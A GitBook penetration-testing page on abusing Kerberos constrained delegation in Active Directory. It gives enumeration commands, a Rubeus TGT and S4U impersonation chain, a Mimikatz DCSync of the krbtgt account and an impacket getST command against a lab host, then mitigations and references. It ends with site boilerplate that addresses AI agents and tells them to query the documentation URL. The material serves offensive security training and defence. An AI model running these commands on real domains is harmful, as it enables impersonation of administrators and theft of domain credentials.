# Kerberos Constrained Delegation

### User Account <a href="#user-account" id="user-account"></a>

#### Prerequisites <a href="#prerequisites" id="prerequisites"></a>

Hunting for user accounts that have kerberos-constrained delegation enabled:

{% code title="" %}

```bash
Get-NetUser -TrustedToAuth
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
```

{% endcode %}

In the below screenshot, the user `spot` is allowed to delegate or in other words, impersonate any user and authenticate to a file system service (CIFS) on a domain controller DC01.

User has to have an attribute `TRUSTED_TO_AUTH_FOR_DELEGATION` in order for it to be able to authenticate to the remote service.

> TRUSTED\_TO\_AUTH\_FOR\_DELEGATION - (Windows 2000/Windows Server 2003) The account is enabled for delegation. This is a security-sensitive setting. Accounts that have this option enabled should be tightly controlled. This setting lets a service that runs under the account assume a client's identity and authenticate as that user to other remote servers on the network.
>
> <https://support.microsoft.com/en-gb/help/305144/how-to-use-useraccountcontrol-to-manipulate-user-account-properties>

<figure><img src="https://3312882845-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FD5rqliIRJ8NoRpcxtWHk%2Fuploads%2FEtejm8yeAs083trUs418%2Fimage.png?alt=media&#x26;token=1d203a80-8217-4cf2-83e8-b036da748db4" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```bash
rubeus.exe asktgt /user:userName /domain:DomainName /ntlm:Hash /outfile:FileName.tgt
```

{% endcode %}

<figure><img src="https://3312882845-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FD5rqliIRJ8NoRpcxtWHk%2Fuploads%2FfRqlODOeEyCPckalg0D5%2Fimage.png?alt=media&#x26;token=90ec30c7-78e7-47b5-bc3c-17cd91525652" alt=""><figcaption><p>TGT ticket for the websvc account.</p></figcaption></figure>

{% code overflow="wrap" %}

```bash
.\Rubeus.exe s4u /ticket:TGT_Ticket /msdsspn:"service/HOST" /impersonateuser:Administrator /ptt
```

{% endcode %}

<figure><img src="https://3312882845-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FD5rqliIRJ8NoRpcxtWHk%2Fuploads%2Fi5oFZbNEmyeQRGIOcmtb%2Fimage.png?alt=media&#x26;token=e8ad531c-028c-424e-82c3-bcbfab5cf886" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3312882845-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FD5rqliIRJ8NoRpcxtWHk%2Fuploads%2Fxznfo959fj86JWxCt1Vp%2Fimage.png?alt=media&#x26;token=bd39ae9a-5924-4c01-b474-b5a0593ce53b" alt=""><figcaption></figcaption></figure>

```bison
invoke-Mimikatz -command '"lsadump::dcsync /user:abdo\krbtgt "'
```

<figure><img src="https://3312882845-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FD5rqliIRJ8NoRpcxtWHk%2Fuploads%2FXHdPAd7rtmHNT7VOjOI9%2Fimage.png?alt=media&#x26;token=1321b9cd-8d6e-4560-95a1-0277ca190609" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```bash
impacket-getST   -k -impersonate administrator -spn cifs/HayStack.thm.corp -dc-ip 10.10.43.21 thm.corp/DARLA_WINTERS
```

{% endcode %}

## Mitigation <a href="#id-660b" id="id-660b"></a>

* To mitigate against the abuse of delegated accounts, we can ensure that the privileged accounts are configured to “*Account is sensitive and cannot be delegated”* within the Active Directory or added to the Protected User group to prevent delegation.
* If delegation is needed for specific accounts, they should be secured with firewall rules that only serve the purpose and delegation to the required service and limit any other privileged access that might not be necessary.
* Also, ensure the delegated accounts use strong passwords to protect them against attacks like Kerberoasting.

## ��**$\_References** <a href="#id-6572" id="id-6572"></a>

{% embed url="<https://docs.microsoft.com/en-us/windows-server/security/kerberos/kerberos-constrained-delegation-overview?source=post_page-----4a0eddc5bb13-------------------------------->" %}

{% embed url="<https://stealthbits.com/blog/what-is-kerberos-delegation-an-overview-of-kerberos-delegation/?source=post_page-----4a0eddc5bb13-------------------------------->" %}

{% embed url="<https://www.cyberark.com/resources/threat-research-blog/weakness-within-kerberos-delegation?source=post_page-----4a0eddc5bb13-------------------------------->" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://h3ckt0r.gitbook.io/0xsec/elite/network-pentest/active-directory/ad-techniques/domain-privesc/kerberos-constrained-delegation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.